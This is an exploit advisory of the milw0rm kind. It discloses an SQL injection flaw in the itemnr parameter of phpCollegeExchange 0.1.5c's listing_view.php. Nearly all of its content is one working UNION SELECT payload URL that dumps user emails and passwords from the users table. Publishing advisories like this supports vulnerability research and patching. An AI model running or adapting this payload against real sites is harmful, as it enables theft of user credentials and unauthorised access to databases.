15 lines
No EOL
732 B
Text
15 lines
No EOL
732 B
Text
#################################################################################################################
|
|
[+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability
|
|
[+] Discovered By SirGod
|
|
[+] www.mortal-team.org
|
|
#################################################################################################################
|
|
|
|
[+] Script homepage : http://phpcollegeex.sourceforge.net/
|
|
|
|
[+] SQL Injection
|
|
|
|
http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users--
|
|
|
|
#################################################################################################################
|
|
|
|
# milw0rm.com [2009-06-15] |